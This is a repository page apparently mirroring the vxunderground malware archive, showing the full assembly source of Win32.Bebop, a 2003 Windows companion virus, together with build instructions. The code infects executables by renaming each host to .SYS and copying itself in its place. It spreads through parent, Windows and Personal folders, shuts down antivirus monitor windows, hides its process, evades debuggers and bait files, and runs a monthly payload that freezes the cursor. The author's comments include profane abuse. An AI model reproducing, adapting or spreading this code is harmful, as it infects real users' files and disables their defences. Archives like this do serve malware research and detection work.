ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 09:26:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
main
MalwareSourceCode/Win32/Infector/Win32.Bebop.asm
TheDuchy cfc6699241 Updated dir structure in Win32
2020-10-16 23:26:21 +02:00

634 lines
23 KiB
NASM
Raw Permalink Blame History

COMMENT#
____________________________________________________________________________________________
Win32.Bebop - Virus [Companion]
coded by -DiA- (c)03
GermanY
____________________________________________________________________________________________
Intro:
Yeah! My new creature. This is a Companion Virus (what else?). Ok, I hope you enjoy
this, and let the CODE speak...
Disclaimer:
I am NOT responsible for any damage that you do! You can need the code however you want..
My motherlanguage is not English, I hope you understand what I mean.
Feel FREE to write any Comments to
DiA_hates_machine@gmx.de
Infection:
-infect current directory
-travel directory's downwards and infect them all
-go to the Windows folder and infect them
-go to the Personal folder and infect them
-infect twenty files per run
-don't infect again
Features:
-Anti-Debug
-Anti-AV-Monitors
-Anti-Bait
Payload:
-on the first day every month
-first show a little message
-after that the cursor is very slow
-workz with a thread
Greetz:
Industry - m8! See on rRLF 3
Monochrom - thanx for TASM32, you see... ;)
Weed - thanx for all, my little ganja
MyCrew - Next month, HARDCORE at Skatehall! Rock on.
?????? - and to the fucker that send me two or three mails: "Be a Internet Million..
" FUCK YOU, YOU STUPID MOTHERFUCKER! Don't send me mail's, Son of a Bitch!
First Generation:
;-----cut-----Bebop666.asm---------------------------------------------------------------
.386
.model flat
jumps
extrn MessageBoxA :PROC
extrn ExitProcess :PROC
.data
oTitle db 'Win32.Bebop - Virus - First Generation',0
oMsg db 'Yo dood, this is only the first generation',10,13
db 'from the Bebop - Virus. Have fun, now you',10,13
db 'are infected...',10,13,10,13
db ' coded by DiA 03 GermanY',0
.code
FirstGen:
push 16
push offset oTitle
push offset oMsg
push 0
call MessageBoxA
push 0
call ExitProcess
end FirstGen
;-----cut--------------------------------------------------------------------------------
Compile:
First Gen->
TASM32 /z /ml /m3 Bebop666,,;
TLINK32 -Tpe -c -aa Bebop666,Bebop666,, import32.lib
rename Bebop666.EXE Bebop.SYS
Virus ->
TASM32 /z /ml /m3 Bebop,,;
TLINK32 -Tpe -c -aa Bebop,Bebop,, import32.lib
[Bebop.EXE and Bebop.SYS must be in one directory]
Ok, that's it! I write many comment's in the code...
...HAVE FUN and read my tut's! :)
____________________________________________________________________________________________
____________________________________________________________________________________________
#
;-------------------------------------------------------------------------------------------
;-----HEAD----------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
.386
.model flat
jumps
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Needed API's--------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
extrn IsDebuggerPresent :PROC
extrn GetCurrentProcessId :PROC
extrn RegisterServiceProcess :PROC
extrn GetCommandLineA :PROC
extrn lstrcpyA :PROC
extrn CreateProcessA :PROC
extrn CopyFileA :PROC
extrn FindFirstFileA :PROC
extrn FindNextFileA :PROC
extrn SetCurrentDirectoryA :PROC
extrn RegOpenKeyExA :PROC
extrn RegQueryValueExA :PROC
extrn RegCloseKey :PROC
extrn FindWindowA :PROC
extrn PostMessageA :PROC
extrn GetWindowsDirectoryA :PROC
extrn GetSystemTime :PROC
extrn CreateThread :PROC
extrn CloseHandle :PROC
extrn GetCursorPos :PROC
extrn SetCursorPos :PROC
extrn Sleep :PROC
extrn MessageBoxA :PROC
extrn ExitProcess :PROC
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Nedded DATA's-------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
.data?
FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS
WIN32_FIND_DATA label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db 260d dup (?)
WFD_szAlternateFileName db 13 dup (?)
WFD_szAlternateEnding db 03 dup (?)
SYSTEMTIME:
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMilliseconds WORD ?
POINT:
x DWORD ?
y DWORD ?
VirusFile db 260d dup (?)
HostFile db 260d dup (?)
TargetFile db 260d dup (?)
ProcessInfo dd 4 dup (?)
StartupInfo dd 4 dup (?)
PersonalFolder db 260d dup (?)
WindowsFolder db 260d dup (?)
.data
AVP db 'AVP Monitor',0
McAfee db 'McAfee VShield',0
Solomon db 'SCAN32',0
FProt db 'FP-WIN',0
Norton db 'NAVAPW32',0
FindHandle dd 0
RegHandle dd 0
lpType dd 0
ThreadID dd 0
FileMask db '*.EXE',0
FileCounter db 20
Size dd 260d
ShellFolders db '.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
Personal db 'Personal',0
oTitle db 'Win32.Bebop - Virus',0
oMsg db 'Yeah! Bebop get''s you. Don''t be angry, this nice',10,13
db 'Virus don''t have any DESTRUCTIVE CODE!',10,13
db 'Or for stupid people: Wait a while, next day the',10,13
db 'Bebop-Virus go away...',10,13,10,13
db ' Win32.Bebop coded by DiA (c)2003 [GermanY]',0
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Win32.Bebop starts--------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
.code
Bebop:
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Fuck some AV-Monitors-----------------------------------------------------------------
;-------------------------------------------------------------------------------------------
call AntiDebugger ;check for debugger
mov esi,offset AVP
call KillMonitor ;kill the window
mov esi,offset McAfee
call KillMonitor ;kill the window
mov esi,offset Solomon
call KillMonitor ;kill the window
mov esi,offset FProt
call KillMonitor ;kill the window
mov esi,offset Norton
call KillMonitor ;kill the window
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Hide the Bebop Process----------------------------------------------------------------
;-------------------------------------------------------------------------------------------
call GetCurrentProcessId ;get id to hide the Bebop
push 1 ;register as "SystemService"
push eax ;ProcessID
call RegisterServiceProcess
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Restore Hostname & Run Host-----------------------------------------------------------
;-------------------------------------------------------------------------------------------
call GetCommandLineA ;looks like "C:\MyC00lPr0gZ\veryCool\Fucking.EXE"
inc eax ;fuck the "
push eax
push offset VirusFile ;copy it to VirusFile to work with it
call lstrcpyA ;copy the string
mov esi,offset VirusFile
call GetPoint ;get the point (...ddd.EXE") to clear "
mov dword ptr [esi+4],00000000h ;fuck it, now we have the path of the VirusFile
push offset VirusFile ;copy path of VirusFile to
push offset HostFile ;HostFile, to work with it
call lstrcpyA
mov esi,offset HostFile
call GetPoint ;get point to rename it
mov dword ptr [esi],5359532Eh ; SYS. ,now we have the path of the HostFile
call AntiDebugger ;check for debugger
xor eax,eax ;null
push offset ProcessInfo
push offset StartupInfo
push eax
push eax
push 10h ;create a new process
push eax
push eax
push eax
push offset HostFile ;path for HostFile
push offset HostFile ;run this file
call CreateProcessA
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Travel Directorys & Infect them-------------------------------------------------------
;-------------------------------------------------------------------------------------------
mov esi,offset HostFile ;don't need anymore, use it to get the directory
call GetPoint ;first get the point
mov ebx,esi ;first get the path of current dir
call CDdotdot ;-"-
call InfectFiles ;and infect files in this directory
InfectCDdotdot:
call CDdotdot ;cd..
test ebx,ebx ;error code?
jz InfectNext ;if yes search other dir's
call InfectFiles ;infect it!
jmp InfectCDdotdot ;cd.. , infect, cd.. , ...
InfectNext: ;other directorys
call AntiDebugger ;often!
push 260d
push offset WindowsFolder ;save there
call GetWindowsDirectoryA ;easyer to get it with api, not registry
mov esi,offset WindowsFolder ;set directory
call SetDirectory
call InfectFiles ;and infect them
call GetPersonalDir ;infect them too
mov esi,offset PersonalFolder ;to set the directory
call SetDirectory ;set it
call InfectFiles ;infect them
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Payload, if Day 1. of Month-----------------------------------------------------------
;-------------------------------------------------------------------------------------------
push offset SYSTEMTIME ;structure
call GetSystemTime ;get time
cmp word ptr [wDay],1 ;first day of mounth?
jne FuckingDebugger ;if not exit
push offset ThreadID ;the ID
push 0
push 0
push offset StopCursor ;the pklace where are the thread
push 0
push 0
call CreateThread
push eax ;close da handle
call CloseHandle ;close it
GetCurrentPos: ;get current cursor pos
push offset POINT ;structure
call GetCursorPos
jmp GetCurrentPos ;again and again
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Exit & stay (sic)---------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
FuckingDebugger:
push 0
call ExitProcess
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Infect Files Procedure----------------------------------------------------------------
;-------------------------------------------------------------------------------------------
InfectFiles: ;procedure
call AntiDebugger ;fuck you!
push offset WIN32_FIND_DATA ;Win32 find data is kewl
push offset FileMask ;'*.EXE',0
call FindFirstFileA ;find first
mov dword ptr [FindHandle],eax ;save da handle
FindNext:
test eax,eax ;error?
jz FindMore ;check other directory's
push offset WFD_szFileName ;copy filename of founded file
push offset TargetFile ;to rename and copy it
call lstrcpyA
xor eax,eax ;null
mov esi,offset TargetFile ;is it bait?
mov edi,esi
mov ecx,48d ;0
CheckBait: ;check for bait
lodsb ;load one byte
CheckNum: ;check for a digit
cmp eax,46d ; point?
je Bait ;don't infect, it's a fucking bait
cmp eax,ecx ;a number?
je ScanNext ;scan next digit
cmp eax,57d ;over 9
ja NoBait ;it's no bait, ...infect them
inc ecx ;check next number (0,1,2,3,4,...)
jmp CheckNum ;again
ScanNext: ;scan next place
stosb ;save the byte (edi,esi +1)
mov ecx,48d ;restore ecx
jmp CheckBait ;check ma
NoBait: ;go on with infection
mov esi,offset TargetFile ;find point to rename
call GetPoint
mov dword ptr [esi],5359532Eh ;rename to .SYS
push 1 ;don't copy if file allready exist
push offset TargetFile ;copy to this path and filename (TargetFile.SYS)
push offset WFD_szFileName ;the real name to the fake name
call CopyFileA
test eax,eax ;error -> file already exist
jz FindNextPhile ;jmp
push 0 ;copy always
push offset WFD_szFileName ;copy the VirusFile over the real File
push offset VirusFile ;now HostName: xxx.SYS VirusName: xxx.EXE
call CopyFileA
dec byte ptr [FileCounter] ;counter -1
cmp byte ptr [FileCounter],0 ;zero?
jz FuckingDebugger ;if yes exist
FindNextPhile:
call AntiDebugger ;antiman
Bait: ;search next file, last was a bait
push offset WIN32_FIND_DATA ;get info from Win32FindData
push dword ptr [FindHandle] ;handle of file we search...
call FindNextFileA
jmp FindNext ;go up!
FindMore:
ret ;return and search in other directory's
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Anti Debug Procedure------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
AntiDebugger:
call IsDebuggerPresent ;check for Debugger
test eax,eax ;if yes jmp to...
jnz FuckingDebugger ;FuckingDebugger:
ret
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Get Point Procedure-------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
GetPoint: ;procedure
cmp byte ptr [esi],'.' ;check for point
jz FoundPoint ;if point, return
inc esi ;if not check next place
jmp GetPoint
FoundPoint:
call AntiDebugger
ret ;return
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----CD.. Procedure------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
CDdotdot: ;procedure
GetSlash: ;'\'
cmp byte ptr [ebx],'\'
jz ClearAfter ;if yes, clear al after the \
cmp byte ptr [ebx],':' ; are we at C:\
jz SetError ;set a error code and exit procedure
dec ebx ;esi -1
jmp GetSlash ;search again
ClearAfter: ;clear all after the slash
inc ebx ;but don't clear \ (needed to travel!)
mov dword ptr [ebx],00000000h ;fuck it all, fuck this world, fuck everything th...
sub ebx,2 ;go in front of \
mov esi,offset HostFile ;now a path for the directory cd..
SetDirectory: ;procedure
push esi
call SetCurrentDirectoryA ;set the dir
ret ;return
SetError: ;we are at C:, can't cd.. anymore
xor ebx,ebx ;zero
ret
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Read Personal Directory from Registry Procedure---------------------------------------
;-------------------------------------------------------------------------------------------
GetPersonalDir: ;procedure
push offset RegHandle ;save there the handle
push 001F0000h ;read and write
push 0
push offset ShellFolders ;subkey
push 80000003h ;HKEY_...
call RegOpenKeyExA ;open the subkey
test eax,eax ;error?
jnz RegError ;set error code and return
push offset Size ;260d
push offset PersonalFolder ;save the value there
push offset lpType ;fuck off
push 0
push offset Personal ;value name
push dword ptr [RegHandle] ;handle from subkey
call RegQueryValueExA ;read!
RegError: ;error!
call AntiDebugger
push dword ptr [RegHandle] ;close reg
call RegCloseKey
ret
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Anti AV-Monitor Procedure-------------------------------------------------------------
;-------------------------------------------------------------------------------------------
KillMonitor:
call AntiDebugger
push esi ;offset to monitor name
push 0
call FindWindowA ;find it
test eax,eax ;error?
jz FuckNextMonitor ;return
push 0
push 0
push 12h ;WM_QUIT = kill
push eax ;handle of window
call PostMessageA ;shot 'em up
FuckNextMonitor:
ret ;return
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Stop the Cursor Procedure-------------------------------------------------------------
;-------------------------------------------------------------------------------------------
StopCursor:
push 16
push offset oTitle
push offset oMsg
push 0
call MessageBoxA
call AntiDebugger
SleepStop:
push 2000d ;sleep 2sek
call Sleep
xor edx,edx
StopIt:
cmp edx,4000d
je SleepStop
push dword ptr [y] ;y coor
push dword ptr [x] ;x coor
call SetCursorPos ;stop it
inc edx
jmp StopIt ;stop again
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Win32.Bebop ends----------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
end Bebop
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;------------------------------------------------------------------------Germany2003--------
Reference in New Issue View Git Blame Copy Permalink